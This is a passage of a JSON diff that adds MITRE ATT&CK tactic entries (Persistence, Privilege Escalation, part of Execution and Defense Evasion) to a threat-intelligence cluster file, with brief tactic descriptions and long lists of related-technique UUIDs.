"0b9609dd-9f19-4747-ba6e-421b6b7ff03f", + "type": "uses" + }, + { + "dest-uuid": "8edc6345-c423-4872-9e22-11e22d9164ff", + "type": "uses" + }, + { + "dest-uuid": "284bfbb3-99f0-4c3d-bc1f-ab74065b7907", + "type": "uses" + }, + { + "dest-uuid": "496998fe-4066-45cf-b84a-dc428e6819c8", + "type": "uses" + }, + { + "dest-uuid": "b84435ab-2ff4-4b6f-ba71-b4b815474872", + "type": "uses" + }, + { + "dest-uuid": "1bcf9fb5-6848-44d9-b394-ffbd3c357058", + "type": "uses" + }, + { + "dest-uuid": "6ca7838a-e8ad-43e8-9da6-15b640d1cbde", + "type": "uses" + }, + { + "dest-uuid": "8cc9e419-607e-4d2a-91d9-d47022e02bea", + "type": "uses" + }, + { + "dest-uuid": "3eafcd8b-0cb8-4d23-8785-3f80a3c897c7", + "type": "uses" + }, + { + "dest-uuid": "afa4e2b5-cdd8-4d54-bcdb-acee8b5649e4", + "type": "uses" + }, + { + "dest-uuid": "f795ef6d-d2cf-440e-b871-ab19dc385789", + "type": "uses" + }, + { + "dest-uuid": "068df3d7-f788-44e4-9e6b-2ae443af1609", + "type": "uses" + }, + { + "dest-uuid": "68fed1c9-e060-4c4d-83d9-d8c817893d65", + "type": "uses" + }, + { + "dest-uuid": "a2300ed3-a502-4fe4-bad5-4aa1efc72941", + "type": "uses" + }, + { + "dest-uuid": "be095bcc-4769-4010-b2db-3033d01efdbe", + "type": "uses" + }, + { + "dest-uuid": "0340ed34-6db2-4979-bf73-2c16855867b4", + "type": "uses" + }, + { + "dest-uuid": "d9edb609-2ca3-43d1-9c4d-c09a2856230f", + "type": "uses" + }, + { + "dest-uuid": "46f60fff-71a1-4cfd-b639-71a0ac903bbb", + "type": "uses" + }, + { + "dest-uuid": "68427c7d-f65a-4545-abfd-13d69e5e50cf", + "type": "uses" + }, + { + "dest-uuid": "6051e618-c476-41db-8b0b-0aef9d2bbbf7", + "type": "uses" + }, + { + "dest-uuid": "af798e80-2cc5-5452-83e4-9560f08bf2d5", + "type": "uses" + }, + { + "dest-uuid": "944a7b91-c58e-567d-9e2c-515b93713c50", + "type": "uses" + } + ], + "uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "value": "Execution" + }, + { + "description": "The adversary is trying to maintain their foothold.\n\nPersistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. Techniques used for persistence include any access, action, or configuration changes that let them maintain their foothold on systems, such as replacing or hijacking legitimate code or adding startup code. ", + "meta": { + "ordinal_position": 5, + "source": "MITRE", + "tactic_attack_id": "TA0003", + "tags": [] + }, + "related": [ + { + "dest-uuid": "723c6d51-91db-4658-9ee0-eafb953c2d82", + "type": "uses" + }, + { + "dest-uuid": "f0dd515b-51cf-4853-a20c-02226d099ee0", + "type": "uses" + }, + { + "dest-uuid": "c51f799b-7305-43db-8d3b-657965cad68a", + "type": "uses" + }, + { + "dest-uuid": "852748c2-280b-41e8-ba87-d97ec9fade70", + "type": "uses" + }, + { + "dest-uuid": "0a4dd066-6a28-4dcb-ab3d-215fc01db9cb", + "type": "uses" + }, + { + "dest-uuid": "6e65f84b-cfad-49ce-9072-f2966dc02f56", + "type": "uses" + }, + { + "dest-uuid": "f8aa018b-5134-4201-87f2-e55d20f40b17", + "type": "uses" + }, + { + "dest-uuid": "c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4", + "type": "uses" + }, + { + "dest-uuid": "cd52d338-ba23-43c8-975d-4db29aa96598", + "type": "uses" + }, + { + "dest-uuid": "eb1a471e-e3b5-4790-8c0a-b89b68f244b9", + "type": "uses" + }, + { + "dest-uuid": "4050dbda-5cb0-4bd6-8444-841e55611f3a", + "type": "uses" + }, + { + "dest-uuid": "bc996f67-7cb7-4ba4-9156-4f2f8283d66d", + "type": "uses" + }, + { + "dest-uuid": "032985de-5e09-4889-b8c4-84d940c6346c", + "type": "uses" + }, + { + "dest-uuid": "17b97c19-b986-4653-850a-44aee9aaaba1", + "type": "uses" + }, + { + "dest-uuid": "8bd564d2-a3f1-4367-8631-a2d2cb3a1f46", + "type": "uses" + }, + { + "dest-uuid": "6f2186f3-c798-46e8-a26f-ae033822837b", + "type": "uses" + }, + { + "dest-uuid": "31c6dd3c-3eb2-46a9-ab85-9e8e145810a1", + "type": "uses" + }, + { + "dest-uuid": "803d286d-8104-4af8-9821-3f49240edc2b", + "type": "uses" + }, + { + "dest-uuid": "db846575-a79b-4403-870d-5842be82001d", + "type": "uses" + }, + { + "dest-uuid": "71867386-ddc2-4cdb-a0c9-7c27172c23c1", + "type": "uses" + }, + { + "dest-uuid": "f7544b99-d596-43dd-ab12-3844756f3ad7", + "type": "uses" + }, + { + "dest-uuid": "69cd62f8-b729-4a05-8351-5bb961f7c6d6", + "type": "uses" + }, + { + "dest-uuid": "ecca6c85-3d18-40c0-84d0-d5fb7ebd72b5", + "type": "uses" + }, + { + "dest-uuid": "c2be31d9-c800-4cc7-81b9-f3fdb94fbb43", + "type": "uses" + }, + { + "dest-uuid": "0baf02af-ffaa-403f-9f0d-da51f463a1d8", + "type": "uses" + }, + { + "dest-uuid": "cd65b0f4-a2a4-4291-aff2-1c65cf68cf6c", + "type": "uses" + }, + { + "dest-uuid": "ae967542-1f37-4eea-993d-fff3867f2aea", + "type": "uses" + }, + { + "dest-uuid": "040804f6-6a87-4011-8716-66682bc16ed4", + "type": "uses" + }, + { + "dest-uuid": "d595e757-da2e-4430-95d6-81f7d69738e8", + "type": "uses" + }, + { + "dest-uuid": "efbbe9d1-274c-4383-9c6c-44bd4eca1829", + "type": "uses" + }, + { + "dest-uuid": "ffd9430b-c727-47f4-a1f0-b1d4f8c29740", + "type": "uses" + }, + { + "dest-uuid": "fdf95fac-f7f2-4901-b5fe-b2bafa443939", + "type": "uses" + }, + { + "dest-uuid": "c2cf211a-9676-4922-a386-69697ab4934a", + "type": "uses" + }, + { + "dest-uuid": "bfde0a09-8109-41e4-b8c9-68fe20e8131b", + "type": "uses" + }, + { + "dest-uuid": "b4f2b54c-d304-4e05-a813-69bc7e6fd1f3", + "type": "uses" + }, + { + "dest-uuid": "8a6ec54e-c7cd-4e3c-b848-21f8be2f864a", + "type": "uses" + }, + { + "dest-uuid": "b0a1ef13-0c54-47e8-a220-7543ba41a327", + "type": "uses" + }, + { + "dest-uuid": "eff618a9-6498-4b01-bca1-cd5f3784fc27", + "type": "uses" + }, + { + "dest-uuid": "0df21d65-c885-415a-8f91-477ae1b37839", + "type": "uses" + }, + { + "dest-uuid": "05a5318f-476d-44c1-8a85-9466295d31dd", + "type": "uses" + }, + { + "dest-uuid": "6c55cf9c-0259-4ba0-9574-e90f6c88e6fd", + "type": "uses" + }, + { + "dest-uuid": "2e8cd9a0-846f-416b-80ba-21a15019ce73", + "type": "uses" + }, + { + "dest-uuid": "82c07e34-9f67-4f4e-a513-c22a17b508e5", + "type": "uses" + }, + { + "dest-uuid": "b0d884c3-cf87-4610-992d-4ec54c667759", + "type": "uses" + }, + { + "dest-uuid": "287201c6-56c8-458d-a6b3-5d84ad1099d7", + "type": "uses" + }, + { + "dest-uuid": "6f42559d-fb54-4c82-9ea7-eb9c709dac07", + "type": "uses" + }, + { + "dest-uuid": "4659b96f-0e8d-4480-966b-c75062645f14", + "type": "uses" + }, + { + "dest-uuid": "91d813d3-c17c-4c4c-b86e-0667f669a2f4", + "type": "uses" + }, + { + "dest-uuid": "1f6a471d-49c6-4150-b213-2422d5fd3f26", + "type": "uses" + }, + { + "dest-uuid": "9ed0f5c3-49ff-4c43-bb77-c00e466ce3ba", + "type": "uses" + }, + { + "dest-uuid": "7a7e10ce-f033-460c-9183-5e29a9feb927", + "type": "uses" + }, + { + "dest-uuid": "764041d4-ff10-45d0-b42e-2f23ca334740", + "type": "uses" + }, + { + "dest-uuid": "83a2facf-84e7-4a3c-9dcd-74c4fd33fec6", + "type": "uses" + }, + { + "dest-uuid": "4216058d-0912-4ff3-a7fd-dd7a7b346c96", + "type": "uses" + }, + { + "dest-uuid": "34ffaa47-f591-4a44-bd7d-9790d81365cd", + "type": "uses" + }, + { + "dest-uuid": "33cd26b0-0248-4ee2-97a6-aab6a79824af", + "type": "uses" + }, + { + "dest-uuid": "6556e1cb-87d0-4e67-9d5c-343d1eddf430", + "type": "uses" + }, + { + "dest-uuid": "34a112db-c61d-4ea2-872f-de3fc1af87a3", + "type": "uses" + }, + { + "dest-uuid": "0799f2ee-3a83-452e-9fa9-83e91d83be25", + "type": "uses" + }, + { + "dest-uuid": "043ffb62-dacd-4e21-9c86-b31826176283", + "type": "uses" + }, + { + "dest-uuid": "05435e33-05fe-4a41-b8e4-694d45eb9147", + "type": "uses" + }, + { + "dest-uuid": "9cfbe3ba-957e-49fd-9494-9870e5d0ae16", + "type": "uses" + }, + { + "dest-uuid": "7f9dbafd-4c7e-4bd9-8aff-c2a800743a07", + "type": "uses" + }, + { + "dest-uuid": "bd569ff9-c038-48c0-83d0-f5c784b439bc", + "type": "uses" + }, + { + "dest-uuid": "0ca28cc0-89d0-4680-baef-94d7202c6a9b", + "type": "uses" + }, + { + "dest-uuid": "d6504a4d-f6d7-4517-b0fd-ec7128d4dec9", + "type": "uses" + }, + { + "dest-uuid": "65f7482c-485b-4fd7-80f5-0ec6e923ac4d", + "type": "uses" + }, + { + "dest-uuid": "74e2b24b-3bf7-4361-bc07-983bffe674f7", + "type": "uses" + }, + { + "dest-uuid": "68ffdbed-08d8-46a2-a833-984bbf0d9b4a", + "type": "uses" + }, + { + "dest-uuid": "8cc9e419-607e-4d2a-91d9-d47022e02bea", + "type": "uses" + }, + { + "dest-uuid": "b9d60848-388e-444c-9f22-2267ea61b5e9", + "type": "uses" + }, + { + "dest-uuid": "6fe2a6b8-bfb3-431d-8156-b2d005096f90", + "type": "uses" + }, + { + "dest-uuid": "1085d0c6-4ff3-45f1-8e0c-d8f334f4ba68", + "type": "uses" + }, + { + "dest-uuid": "a9b7eb2f-63e7-41bc-9d77-f7c4cede5406", + "type": "uses" + }, + { + "dest-uuid": "60498bb5-fcfb-4d85-bf3e-26c30c08fbda", + "type": "uses" + }, + { + "dest-uuid": "e4495b87-9b04-4313-b771-7d9703639cce", + "type": "uses" + }, + { + "dest-uuid": "e1e42979-d3cd-461b-afc4-a6373cbf97ba", + "type": "uses" + }, + { + "dest-uuid": "cc5ae19f-981d-4004-bb74-260b8ebad73a", + "type": "uses" + }, + { + "dest-uuid": "7ede5868-1109-4f22-abc7-9495658f7866", + "type": "uses" + }, + { + "dest-uuid": "3e1ef5ba-6426-4fe0-ad48-78557667d680", + "type": "uses" + }, + { + "dest-uuid": "12d918e0-51f7-45cf-b67c-fa60d15599f2", + "type": "uses" + }, + { + "dest-uuid": "08188de6-22c8-42af-b01c-f1c250c22514", + "type": "uses" + }, + { + "dest-uuid": "3d52cd7c-d81b-4762-9749-612bbbccb415", + "type": "uses" + }, + { + "dest-uuid": "74b99029-3f0a-4cc8-90d6-5a6b177c06eb", + "type": "uses" + }, + { + "dest-uuid": "3701f955-596b-422e-9fce-09c4f49cf080", + "type": "uses" + }, + { + "dest-uuid": "6b278e5d-7383-42a4-9425-2da79bbe43e0", + "type": "uses" + }, + { + "dest-uuid": "36b58363-ca6a-4614-bf6f-bfaecafedb5f", + "type": "uses" + }, + { + "dest-uuid": "3f9cd334-0b86-478f-97fa-c3aedd8035d8", + "type": "uses" + }, + { + "dest-uuid": "6dbe030c-5f87-4b45-9b6b-5bba2c0fad00", + "type": "uses" + }, + { + "dest-uuid": "03fb32fa-cdee-4e94-ae3e-16b51a10ba9c", + "type": "uses" + }, + { + "dest-uuid": "82d15799-9776-463e-9b87-a58d682cee55", + "type": "uses" + }, + { + "dest-uuid": "9dc21246-3788-48d6-b6a1-f2a39ee38557", + "type": "uses" + }, + { + "dest-uuid": "8b8c0f91-17fb-41fe-905c-9cbf45593877", + "type": "uses" + }, + { + "dest-uuid": "46ef0f74-b028-4b35-8980-bed066feb60c", + "type": "uses" + }, + { + "dest-uuid": "7aae1ad0-fb1f-484a-a176-c94e4c7ada77", + "type": "uses" + }, + { + "dest-uuid": "55bcf759-a0bf-47e9-99f8-4e8ca997e6ce", + "type": "uses" + }, + { + "dest-uuid": "45f107b6-ae8e-49d7-a3fc-ea6437fbac76", + "type": "uses" + }, + { + "dest-uuid": "9459a27a-b892-4864-9916-814130bea485", + "type": "uses" + }, + { + "dest-uuid": "7851bfe7-f149-47f5-9970-66d7cc4fdbe6", + "type": "uses" + }, + { + "dest-uuid": "15660958-1f4f-4136-8cda-82123fd38232", + "type": "uses" + }, + { + "dest-uuid": "b34ba0fd-493c-4e68-91c4-918f495ad07c", + "type": "uses" + }, + { + "dest-uuid": "62c22cc4-5643-4679-a6ae-9f6a3147d2fe", + "type": "uses" + }, + { + "dest-uuid": "bce86020-2851-4b01-97a9-e51a6b23ea68", + "type": "uses" + }, + { + "dest-uuid": "3c4a2f3a-5877-4a27-a417-76318523657e", + "type": "uses" + }, + { + "dest-uuid": "6051e618-c476-41db-8b0b-0aef9d2bbbf7", + "type": "uses" + }, + { + "dest-uuid": "f516ecd7-a6a6-4018-8e58-c007be05bdce", + "type": "uses" + }, + { + "dest-uuid": "b2cae050-4916-44c0-a6a3-3fa257145872", + "type": "uses" + }, + { + "dest-uuid": "35197aee-8cc9-4584-bd22-33c8885db669", + "type": "uses" + }, + { + "dest-uuid": "195aa08b-15fd-4019-b905-8f31bc5e2094", + "type": "uses" + }, + { + "dest-uuid": "6c8fa277-33c3-45b5-8f0d-9b1c0ccaf284", + "type": "uses" + }, + { + "dest-uuid": "d2a19fd8-ff9c-4f9e-9e84-ed3ea12c4b7c", + "type": "uses" + }, + { + "dest-uuid": "110c385f-9f27-4fd6-837c-6261294073ab", + "type": "uses" + }, + { + "dest-uuid": "f1329084-6e9c-5933-83cd-56c1bf8439e3", + "type": "uses" + }, + { + "dest-uuid": "1169afd3-d80d-5942-b16f-8dc1812ef6bb", + "type": "uses" + }, + { + "dest-uuid": "0719ea2b-d630-5ada-9b04-c3136ff530ae", + "type": "uses" + } + ], + "uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "value": "Persistence" + }, + { + "description": "The adversary is trying to gain higher-level permissions.\n\nPrivilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include: \n\n* SYSTEM/root level\n* local administrator\n* user account with admin-like access \n* user accounts with access to specific system or perform specific function\n\nThese techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context. ", + "meta": { + "ordinal_position": 6, + "source": "MITRE", + "tactic_attack_id": "TA0004", + "tags": [] + }, + "related": [ + { + "dest-uuid": "43d872bd-3d54-4ea3-bc89-a2f979db0d5a", + "type": "uses" + }, + { + "dest-uuid": "723c6d51-91db-4658-9ee0-eafb953c2d82", + "type": "uses" + }, + { + "dest-uuid": "c51f799b-7305-43db-8d3b-657965cad68a", + "type": "uses" + }, + { + "dest-uuid": "0a4dd066-6a28-4dcb-ab3d-215fc01db9cb", + "type": "uses" + }, + { + "dest-uuid": "6e65f84b-cfad-49ce-9072-f2966dc02f56", + "type": "uses" + }, + { + "dest-uuid": "f8aa018b-5134-4201-87f2-e55d20f40b17", + "type": "uses" + }, + { + "dest-uuid": "cd52d338-ba23-43c8-975d-4db29aa96598", + "type": "uses" + }, + { + "dest-uuid": "eb1a471e-e3b5-4790-8c0a-b89b68f244b9", + "type": "uses" + }, + { + "dest-uuid": "5e1499a1-f1ad-4929-84e1-5d33c371c02d", + "type": "uses" + }, + { + "dest-uuid": "e082687f-d403-4246-987b-ad5f12911e4b", + "type": "uses" + }, + { + "dest-uuid": "bc996f67-7cb7-4ba4-9156-4f2f8283d66d", + "type": "uses" + }, + { + "dest-uuid": "17b97c19-b986-4653-850a-44aee9aaaba1", + "type": "uses" + }, + { + "dest-uuid": "8bd564d2-a3f1-4367-8631-a2d2cb3a1f46", + "type": "uses" + }, + { + "dest-uuid": "f534b0a6-4445-409a-889c-6c3ac34656f1", + "type": "uses" + }, + { + "dest-uuid": "31c6dd3c-3eb2-46a9-ab85-9e8e145810a1", + "type": "uses" + }, + { + "dest-uuid": "803d286d-8104-4af8-9821-3f49240edc2b", + "type": "uses" + }, + { + "dest-uuid": "f7544b99-d596-43dd-ab12-3844756f3ad7", + "type": "uses" + }, + { + "dest-uuid": "69cd62f8-b729-4a05-8351-5bb961f7c6d6", + "type": "uses" + }, + { + "dest-uuid": "0baf02af-ffaa-403f-9f0d-da51f463a1d8", + "type": "uses" + }, + { + "dest-uuid": "8e332106-dd58-4adc-927d-57d038af797c", + "type": "uses" + }, + { + "dest-uuid": "efbbe9d1-274c-4383-9c6c-44bd4eca1829", + "type": "uses" + }, + { + "dest-uuid": "ffd9430b-c727-47f4-a1f0-b1d4f8c29740", + "type": "uses" + }, + { + "dest-uuid": "fdf95fac-f7f2-4901-b5fe-b2bafa443939", + "type": "uses" + }, + { + "dest-uuid": "7a6208ac-c75e-4e73-8969-0aaf6085cb6e", + "type": "uses" + }, + { + "dest-uuid": "bebaf25b-9f50-4e3b-96cc-cc55c5765b61", + "type": "uses" + }, + { + "dest-uuid": "bfde0a09-8109-41e4-b8c9-68fe20e8131b", + "type": "uses" + }, + { + "dest-uuid": "8a6ec54e-c7cd-4e3c-b848-21f8be2f864a", + "type": "uses" + }, + { + "dest-uuid": "eff618a9-6498-4b01-bca1-cd5f3784fc27", + "type": "uses" + }, + { + "dest-uuid": "0df21d65-c885-415a-8f91-477ae1b37839", + "type": "uses" + }, + { + "dest-uuid": "7c9035b8-ad4b-4441-be2b-823d86b54fac", + "type": "uses" + }, + { + "dest-uuid": "6c55cf9c-0259-4ba0-9574-e90f6c88e6fd", + "type": "uses" + }, + { + "dest-uuid": "2e8cd9a0-846f-416b-80ba-21a15019ce73", + "type": "uses" + }, + { + "dest-uuid": "82c07e34-9f67-4f4e-a513-c22a17b508e5", + "type": "uses" + }, + { + "dest-uuid": "b0d884c3-cf87-4610-992d-4ec54c667759", + "type": "uses" + }, + { + "dest-uuid": "ac7d9875-d18b-48f6-93e6-47c565f9526b", + "type": "uses" + }, + { + "dest-uuid": "ef0e0599-6543-499d-8409-ef449da5c38a", + "type": "uses" + }, + { + "dest-uuid": "e939bc27-a2cc-4278-be9b-a794c34aacbc", + "type": "uses" + }, + { + "dest-uuid": "6f42559d-fb54-4c82-9ea7-eb9c709dac07", + "type": "uses" + }, + { + "dest-uuid": "91d813d3-c17c-4c4c-b86e-0667f669a2f4", + "type": "uses" + }, + { + "dest-uuid": "5b841b56-6b47-4cec-bf80-71a9a51fa7a0", + "type": "uses" + }, + { + "dest-uuid": "1f6a471d-49c6-4150-b213-2422d5fd3f26", + "type": "uses" + }, + { + "dest-uuid": "9ed0f5c3-49ff-4c43-bb77-c00e466ce3ba", + "type": "uses" + }, + { + "dest-uuid": "abccbb2a-2ea8-43b8-95dc-c583df300c07", + "type": "uses" + }, + { + "dest-uuid": "4216058d-0912-4ff3-a7fd-dd7a7b346c96", + "type": "uses" + }, + { + "dest-uuid": "2afcdcd1-ce55-4837-a84d-8279bc10f948", + "type": "uses" + }, + { + "dest-uuid": "6556e1cb-87d0-4e67-9d5c-343d1eddf430", + "type": "uses" + }, + { + "dest-uuid": "ab823cbf-0238-4347-a191-a90d84b978f7", + "type": "uses" + }, + { + "dest-uuid": "561da0ae-4ebc-4356-a954-338249cac31a", + "type": "uses" + }, + { + "dest-uuid": "043ffb62-dacd-4e21-9c86-b31826176283", + "type": "uses" + }, + { + "dest-uuid": "449abc18-9faf-4ea6-a420-34528c28301d", + "type": "uses" + }, + { + "dest-uuid": "9cfbe3ba-957e-49fd-9494-9870e5d0ae16", + "type": "uses" + }, + { + "dest-uuid": "f060dcca-e7d2-4711-b5d1-41cffcb731b0", + "type": "uses" + }, + { + "dest-uuid": "7f9dbafd-4c7e-4bd9-8aff-c2a800743a07", + "type": "uses" + }, + { + "dest-uuid": "bd569ff9-c038-48c0-83d0-f5c784b439bc", + "type": "uses" + }, + { + "dest-uuid": "0ca28cc0-89d0-4680-baef-94d7202c6a9b", + "type": "uses" + }, + { + "dest-uuid": "74e2b24b-3bf7-4361-bc07-983bffe674f7", + "type": "uses" + }, + { + "dest-uuid": "68ffdbed-08d8-46a2-a833-984bbf0d9b4a", + "type": "uses" + }, + { + "dest-uuid": "8cc9e419-607e-4d2a-91d9-d47022e02bea", + "type": "uses" + }, + { + "dest-uuid": "1085d0c6-4ff3-45f1-8e0c-d8f334f4ba68", + "type": "uses" + }, + { + "dest-uuid": "a9b7eb2f-63e7-41bc-9d77-f7c4cede5406", + "type": "uses" + }, + { + "dest-uuid": "77100337-67a1-4520-b25a-3ddd72b0d5ac", + "type": "uses" + }, + { + "dest-uuid": "9cc715d7-9969-485f-87a2-c9f7ed3cc44c", + "type": "uses" + }, + { + "dest-uuid": "e1e42979-d3cd-461b-afc4-a6373cbf97ba", + "type": "uses" + }, + { + "dest-uuid": "cc5ae19f-981d-4004-bb74-260b8ebad73a", + "type": "uses" + }, + { + "dest-uuid": "dcb323f0-0fe6-4e26-9039-4f26f10cd3a5", + "type": "uses" + }, + { + "dest-uuid": "fd6b86c5-535b-4532-a6d8-a57a6fb04c18", + "type": "uses" + }, + { + "dest-uuid": "7ede5868-1109-4f22-abc7-9495658f7866", + "type": "uses" + }, + { + "dest-uuid": "3e1ef5ba-6426-4fe0-ad48-78557667d680", + "type": "uses" + }, + { + "dest-uuid": "08188de6-22c8-42af-b01c-f1c250c22514", + "type": "uses" + }, + { + "dest-uuid": "3d52cd7c-d81b-4762-9749-612bbbccb415", + "type": "uses" + }, + { + "dest-uuid": "74b99029-3f0a-4cc8-90d6-5a6b177c06eb", + "type": "uses" + }, + { + "dest-uuid": "3701f955-596b-422e-9fce-09c4f49cf080", + "type": "uses" + }, + { + "dest-uuid": "36b58363-ca6a-4614-bf6f-bfaecafedb5f", + "type": "uses" + }, + { + "dest-uuid": "3f9cd334-0b86-478f-97fa-c3aedd8035d8", + "type": "uses" + }, + { + "dest-uuid": "6dbe030c-5f87-4b45-9b6b-5bba2c0fad00", + "type": "uses" + }, + { + "dest-uuid": "7360117a-3404-48d0-9d4b-7f6a61c08f0e", + "type": "uses" + }, + { + "dest-uuid": "8b8c0f91-17fb-41fe-905c-9cbf45593877", + "type": "uses" + }, + { + "dest-uuid": "46ef0f74-b028-4b35-8980-bed066feb60c", + "type": "uses" + }, + { + "dest-uuid": "1423e8c1-7cbf-4cfb-a70d-b6fe8e1a8041", + "type": "uses" + }, + { + "dest-uuid": "7aae1ad0-fb1f-484a-a176-c94e4c7ada77", + "type": "uses" + }, + { + "dest-uuid": "45f107b6-ae8e-49d7-a3fc-ea6437fbac76", + "type": "uses" + }, + { + "dest-uuid": "24e0b530-cca7-4c5c-83b2-97b83c716e42", + "type": "uses" + }, + { + "dest-uuid": "9459a27a-b892-4864-9916-814130bea485", + "type": "uses" + }, + { + "dest-uuid": "7851bfe7-f149-47f5-9970-66d7cc4fdbe6", + "type": "uses" + }, + { + "dest-uuid": "e200d4c9-2d9c-4303-a2de-86baae85c60f", + "type": "uses" + }, + { + "dest-uuid": "b34ba0fd-493c-4e68-91c4-918f495ad07c", + "type": "uses" + }, + { + "dest-uuid": "c262a10e-13db-4c47-995c-87201cdf858d", + "type": "uses" + }, + { + "dest-uuid": "d092a9e1-63d0-415d-8cd0-666a261be5d9", + "type": "uses" + }, + { + "dest-uuid": "bce86020-2851-4b01-97a9-e51a6b23ea68", + "type": "uses" + }, + { + "dest-uuid": "3c4a2f3a-5877-4a27-a417-76318523657e", + "type": "uses" + }, + { + "dest-uuid": "6051e618-c476-41db-8b0b-0aef9d2bbbf7", + "type": "uses" + }, + { + "dest-uuid": "232bb95b-a267-4cc2-8eb1-67ecdd5babd5", + "type": "uses" + }, + { + "dest-uuid": "b2cae050-4916-44c0-a6a3-3fa257145872", + "type": "uses" + }, + { + "dest-uuid": "6c8fa277-33c3-45b5-8f0d-9b1c0ccaf284", + "type": "uses" + }, + { + "dest-uuid": "d2a19fd8-ff9c-4f9e-9e84-ed3ea12c4b7c", + "type": "uses" + }, + { + "dest-uuid": "110c385f-9f27-4fd6-837c-6261294073ab", + "type": "uses" + }, + { + "dest-uuid": "71867386-ddc2-4cdb-a0c9-7c27172c23c1", + "type": "uses" + }, + { + "dest-uuid": "1169afd3-d80d-5942-b16f-8dc1812ef6bb", + "type": "uses" + }, + { + "dest-uuid": "4659b96f-0e8d-4480-966b-c75062645f14", + "type": "uses" + }, + { + "dest-uuid": "448dc009-2d3f-5480-aba3-0d80dc4336cd", + "type": "uses" + }, + { + "dest-uuid": "34ffaa47-f591-4a44-bd7d-9790d81365cd", + "type": "uses" + }, + { + "dest-uuid": "0799f2ee-3a83-452e-9fa9-83e91d83be25", + "type": "uses" + }, + { + "dest-uuid": "65f7482c-485b-4fd7-80f5-0ec6e923ac4d", + "type": "uses" + }, + { + "dest-uuid": "15660958-1f4f-4136-8cda-82123fd38232", + "type": "uses" + } + ], + "uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "value": "Privilege Escalation" + }, + { + "description": "The adversary is trying to avoid being detected.\n\nDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses. ", + "meta": { + "ordinal_position": 7, + "source": "MITRE", + "tactic_attack_id": "TA0005", + "tags": [] + }, + "related": [ + { + "dest-uuid": "43d872bd-3d54-4ea3-bc89-a2f979db0d5a", + "type": "uses" + }, + { + "dest-uuid": "f0dd515b-51cf-4853-a20c-02226d099ee0", + "type": "uses" + }, + { + "dest-uuid": "5652575d-cdb9-44ef-9c32-fff038f15444", + "type": "uses" + }, + { + "dest-uuid": "81564f1d-9c72-4d03-8561-b0d255f76c5f", + "type": "uses" + }, + { + "dest-uuid": "852748c2-280b-41e8-ba87-d97ec9fade70", + "type": "uses" + }, + { + "dest-uuid": "d1836637-e61d-42bb-9067-b325a201b7c7", + "type": "uses" + }, + { + "dest-uuid": "5c6687f6-3539-4268-a6a4-2b98fdeac0fb", + "type": "uses" + }, + { + "dest-uuid": "f46405a6-b9a3-4124-8bce-5a786038f28f", + "type": "uses" + }, + { + "dest-uuid": "0a4dd066-6a28-4dcb-ab3d-215fc01db9cb", + "type": "uses" + }, + { + "dest-uuid": "447f1d32-31f7-44b5-834a-dcba8b038e7f", + "type": "uses" + }, + { + "dest-uuid": "01505d46-8675-408d-881e-68f4d8743d47", + "type": "uses" + }, + { + "dest-uuid": "cf2b56f6-3ebd-48ec-b9d9-835397acef89", + "type": "uses" + }, + { + "dest-uuid": "7ae6fae6-b816-416d-8701-1cb471218fd5", + "type": "uses" + }, + { + "dest-uuid": "5e1499a1-f1ad-4929-84e1-5d33c371c02d", + "type": "uses" + }, + { + "dest-uuid": "e082687f-d403-4246-987b-ad5f12911e4b", + "type": "uses" + }, + { + "dest-uuid": "46c78b63-d079-441e-abdd-c16b39d4bab3", + "type": "uses" + }, + { + "dest-uuid": "4050dbda-5cb0-4bd6-8444-841e55611f3a", + "type": "uses" + }, + { + "dest-uuid": "bc996f67-7cb7-4ba4-9156-4f2f8283d66d", + "type": "uses" + }, + { + "dest-uuid": "032985de-5e09-4889-b8c4-84d940c6346c", + "type": "uses" + }, + { + "dest-uuid": "766dd13c-6ee1-41da-81cd-a22a27d68103", + "type": "uses" + }, + { + "dest-uuid": "442f60ed-5195-45c3-9d8c-7e17cabe7869", + "type": "uses" + }, + { + "dest-uuid": "8cf19b3d-c9fa-4d71-a6ab-dc0e236e57d4", + "type": "uses" + }, + { + "dest-uuid": "f37f0cd5-0446-415f-9309-94e25aa1165d", + "type": "uses" + }, + { + "dest-uuid": "f534b0a6-4445-409a-889c-6c3ac34656f1", + "type": "uses" + }, + { + "dest-uuid": "e6549d57-de83-4fee-96f1-2c4a1cdb654f", + "type": "uses" + }, + { + "dest-uuid": "6f2186f3-c798-46e8-a26f-ae033822837b", + "type": "uses" + }, + { + "dest-uuid": "026c9281-07f1-4358-96d3-151fed76b1fe", + "type": "uses" + }, + { + "dest-uuid": "2f32c30e-b79a-497a-b05f-ab8bd93aa689", + "type": "uses" + }, + { + "dest-uuid": "9ca43902-5632-43e9-9dc1-84a8eafe44bd", + "type": "uses" + }, + { + "dest-uuid": "018381a5-df0a-4636-9df2-294101fb2092", + "type": "uses" + }, + { + "dest-uuid": "69cd62f8-b729-4a05-8351-5bb961f7c6d6", + "type": "uses" + }, + { + "dest-uuid": "e558aca4-3db1-42a0-bec2-bb9823852b49", + "type": "uses" + }, + { + "dest-uuid": "9449c0d5-7445-45e0-9861-7aafd6531733", + "type": "uses" + }, + { + "dest-uuid": "9d36254c-e568-4c03-8688-e6eed5f7510c", + "type": "uses" + }, + { + "dest-uuid": "95ea2f53-b6c8-4f85-a3f7-528eeadd3c48", + "type": "uses" + }, + { + "dest-uuid": "cd65b0f4-a2a4-4291-aff2-1c65cf68cf6c", + "type": "uses" + }, + { + "dest-uuid": "39d589f9-fa73-4988-95e2-2a022851d8b8", + "type": "uses" + }, + { + "dest-uuid": "aa6595d5-1b2e-45a8-8caf-b0968aeab2ba", + "type": "uses" + }, + { + "dest-uuid": "074cf118-cd7f-41c2-bb54-43380bfa45ca", + "type": "uses" + }, + { + "dest-uuid": "91e79eb9-7f99-4890-8bef-9543d307206d", + "type": "uses" + }, + { + "dest-uuid": 